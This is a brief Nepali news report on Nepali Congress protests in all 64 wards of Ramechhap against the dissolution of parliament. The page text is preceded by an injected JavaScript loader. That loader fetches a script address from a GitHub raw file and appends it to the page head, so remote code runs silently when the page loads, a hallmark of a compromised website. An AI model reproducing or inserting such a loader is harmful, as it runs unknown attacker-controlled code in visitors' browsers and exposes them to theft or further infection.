;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ ०८,
रामेछाप । नेपाली कांग्रेस रामेछापले ६४ वटै वडामा सरकार बिरुद्ध प्रर्दशन गरेको छ ।
बिहिबार ६४ वटै वडाका कांग्रेसका कार्यकर्ताहरुले संसद् बिघटन असंबैधानिक र अलोकतान्त्रिक भएको भन्दै एकै साथ प्रर्दशन गरेका छन् । उनीहरुले मोटरसाइकल र्यालीसहित विभिन्न ठाउँमा प्रर्दशन गरेका हुन् ।
जिल्लाका सबै वडाहरुमा प्रर्दशन गर्दै सरकार बिरुद्ध नाराबाजी गरेका छन् । त्यस्तै संसद् पुःनस्थापना गर्न माग गरेका छन् । कोरोना भाइरस नियन्त्रण लगाएतका काम गर्न नसकेको भन्दै सरकारको आलोचन समेत गरेका छन् ।
जिल्लाका सबै ठाउँमा प्रर्दशन सशक्त रुपमा सम्पन्न भएको नेपाली कांग्रेस रामेछापका सभापति लवश्री न्यौपानेले बताए । उनले सबै ठाउँमा प्रर्दशन शान्ति पूर्ण भएको बताए ।
फोटोहरु सामाजिक संजाल
फेसबुक प्रतिक्रियाहरु